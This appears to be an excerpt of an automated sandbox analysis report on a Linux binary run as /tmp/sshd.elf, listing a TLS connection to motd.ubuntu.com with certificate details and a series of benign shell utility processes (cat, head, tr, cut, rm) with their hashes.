                                                                                                                          Mar 27, 2025 22:05:09.140872002 CET34.254.182.186443192.168.2.1354636CN=motd.ubuntu.com CN=R10, O=Let's Encrypt, C=USCN=R10, O=Let's Encrypt, C=US CN=ISRG Root X1, O=Internet Security Research Group, C=USSat Mar 22 09:18:05 CET 2025 Wed Mar 13 01:00:00 CET 2024Fri Jun 20 10:18:04 CEST 2025 Sat Mar 13 00:59:59 CET 2027771,4866-4867-4865-49196-49200-163-159-52393-52392-52394-49327-49325-49315-49311-49245-49249-49239-49235-49195-49199-162-158-49326-49324-49314-49310-49244-49248-49238-49234-49188-49192-107-106-49267-49271-196-195-49187-49191-103-64-49266-49270-190-189-49162-49172-57-56-136-135-49161-49171-51-50-69-68-157-49313-49309-49233-156-49312-49308-49232-61-192-60-186-53-132-47-65-255,0-11-10-35-22-23-13-43-45-51,29-23-30-25-24,0-1-2fb4726d465c5f28b84cd6d14cedd13a7
                                                                                                                          CN=R10, O=Let's Encrypt, C=USCN=ISRG Root X1, O=Internet Security Research Group, C=USWed Mar 13 01:00:00 CET 2024Sat Mar 13 00:59:59 CET 2027

                                                                                                                          System Behavior

                                                                                                                          Start time (UTC):21:05:07
                                                                                                                          Start date (UTC):27/03/2025
                                                                                                                          Path:/tmp/sshd.elf
                                                                                                                          Arguments:/tmp/sshd.elf
                                                                                                                          File size:5773336 bytes
                                                                                                                          MD5 hash:0d6f61f82cf2f781c6eb0661071d42d9

                                                                                                                          Start time (UTC):21:05:08
                                                                                                                          Start date (UTC):27/03/2025
                                                                                                                          Path:/tmp/sshd.elf
                                                                                                                          Arguments:-
                                                                                                                          File size:5773336 bytes
                                                                                                                          MD5 hash:0d6f61f82cf2f781c6eb0661071d42d9

                                                                                                                          Start time (UTC):21:05:08
                                                                                                                          Start date (UTC):27/03/2025
                                                                                                                          Path:/tmp/sshd.elf
                                                                                                                          Arguments:-
                                                                                                                          File size:5773336 bytes
                                                                                                                          MD5 hash:0d6f61f82cf2f781c6eb0661071d42d9

                                                                                                                          Start time (UTC):21:05:08
                                                                                                                          Start date (UTC):27/03/2025
                                                                                                                          Path:/usr/bin/dash
                                                                                                                          Arguments:-
                                                                                                                          File size:129816 bytes
                                                                                                                          MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                                                          Start time (UTC):21:05:08
                                                                                                                          Start date (UTC):27/03/2025
                                                                                                                          Path:/usr/bin/rm
                                                                                                                          Arguments:rm -f /tmp/tmp.n2YaaptlPb /tmp/tmp.dwf0pdHIMv /tmp/tmp.peWuOPTNhV
                                                                                                                          File size:72056 bytes
                                                                                                                          MD5 hash:aa2b5496fdbfd88e38791ab81f90b95b

                                                                                                                          Start time (UTC):21:05:08
                                                                                                                          Start date (UTC):27/03/2025
                                                                                                                          Path:/usr/bin/dash
                                                                                                                          Arguments:-
                                                                                                                          File size:129816 bytes
                                                                                                                          MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                                                          Start time (UTC):21:05:08
                                                                                                                          Start date (UTC):27/03/2025
                                                                                                                          Path:/usr/bin/cat
                                                                                                                          Arguments:cat /tmp/tmp.n2YaaptlPb
                                                                                                                          File size:43416 bytes
                                                                                                                          MD5 hash:7e9d213e404ad3bb82e4ebb2e1f2c1b3

                                                                                                                          Start time (UTC):21:05:08
                                                                                                                          Start date (UTC):27/03/2025
                                                                                                                          Path:/usr/bin/dash
                                                                                                                          Arguments:-
                                                                                                                          File size:129816 bytes
                                                                                                                          MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                                                          Start time (UTC):21:05:08
                                                                                                                          Start date (UTC):27/03/2025
                                                                                                                          Path:/usr/bin/head
                                                                                                                          Arguments:head -n 10
                                                                                                                          File size:47480 bytes
                                                                                                                          MD5 hash:fd96a67145172477dd57131396fc9608

                                                                                                                          Start time (UTC):21:05:08
                                                                                                                          Start date (UTC):27/03/2025
                                                                                                                          Path:/usr/bin/dash
                                                                                                                          Arguments:-
                                                                                                                          File size:129816 bytes
                                                                                                                          MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                                                          Start time (UTC):21:05:08
                                                                                                                          Start date (UTC):27/03/2025
                                                                                                                          Path:/usr/bin/tr
                                                                                                                          Arguments:tr -d \\000-\\011\\013\\014\\016-\\037
                                                                                                                          File size:51544 bytes
                                                                                                                          MD5 hash:fbd1402dd9f72d8ebfff00ce7c3a7bb5

                                                                                                                          Start time (UTC):21:05:08
                                                                                                                          Start date (UTC):27/03/2025
                                                                                                                          Path:/usr/bin/dash
                                                                                                                          Arguments:-
                                                                                                                          File size:129816 bytes
                                                                                                                          MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                                                          Start time (UTC):21:05:08
                                                                                                                          Start date (UTC):27/03/2025
                                                                                                                          Path:/usr/bin/cut
                                                                                                                          Arguments:cut -c -80
                                                                                                                          File size:47480 bytes
                                                                                                                          MD5 hash:d8ed0ea8f22c0de0f8692d4d9f1759d3

                                                                                                                          Start time (UTC):21:05:08
                                                                                                                          Start date (UTC):27/03/2025
                                                                                                                          Path:/usr/bin/dash
                                                                                                                          Arguments:-
                                                                                                                          File size:129816 bytes
                                                                                                                          MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                                                          Start time (UTC):21:05:08
                                                                                                                          Start date (UTC):27/03/2025
                                                                                                                          Path:/usr/bin/cat
                                                                                                                          Arguments:cat /tmp/tmp.n2YaaptlPb
                                                                                                                          File size:43416 bytes
                                                                                                                          MD5 hash:7e9d213e404ad3bb82e4ebb2e1f2c1b3

                                                                                                                          Start time (UTC):21:05:08
                                                                                                                          Start date (UTC):27/03/2025
                                                                                                                          Path:/usr/bin/dash
                                                                                                                          Arguments:-
                                                                                                                          File size:129816 bytes
                                                                                                                          MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                                                          Start time (UTC):21:05:08
                                                                                                                          Start date (UTC):27/03/2025
                                                                                                                          Path:/usr/bin/head
                                                                                                                          Arguments:head -n 10
                                                                                                                          File size:47480 bytes
                                                                                                                          MD5 hash:fd96a67145172477dd57131396fc9608

                                                                                                                          Start time (UTC):21:05:08
                                                                                                                          Start date (UTC):27/03/2025
                                                                                                                          Path:/usr/bin/dash
                                                                                                                          Arguments:-
                                                                                                                          File size:129816 bytes
                                                                                                                          MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                                                          Start time (UTC):21:05:08
                                                                                                                          Start date (UTC):27/03/2025
                                                                                                                          Path:/usr/bin/tr
                                                                                                                          Arguments:tr -d \\000-\\011\\013\\014\\016-\\037
                                                                                                                          File size:51544 bytes
                                                                                                                          MD5 hash:fbd1402dd9f72d8ebfff00ce7c3a7bb5

                                                                                                                          Start time (UTC):21:05:08
                                                                                                                          Start date (UTC):27/03/2025
                                                                                                                          Path:/usr/bin/dash
                                                                                                                          Arguments:-
                                                                                                                          File size:129816 bytes
                                                                                                                          MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                                                          Start time (UTC):21:05:08
                                                                                                                          Start date (UTC):27/03/2025
                                                                                                                          Path:/usr/bin/cut
                                                                                                                          Arguments:cut -c -80
                                                                                                                          File size:47480 bytes
                                                                                                                          MD5 hash:d8ed0ea8f22c0de0f8692d4d9f1759d3

                                                                                                                          Start time (UTC):21:05:08
                                                                                                                          Start date (UTC):27/03/2025
                                                                                                                          Path:/usr/bin/dash
                                                                                                                          Arguments:-
                                                                                                                          File size:129816 bytes
                                                                                                                          MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                                                          Start time (UTC):21:05:08
                                                                                                                          Start date (UTC):27/03/2025
                                                                                                                          Path:/usr/bin/rm
                                                                                                                          Arguments:rm -f /tmp/tmp.n2YaaptlPb /tmp/tmp.dwf0pdHIMv /tmp/tmp.peWuOPTNhV
                                                                                                                          File size:72056 bytes
                                                                                                                          MD5 hash:aa2b5496fdbfd88e38791ab81f90b95b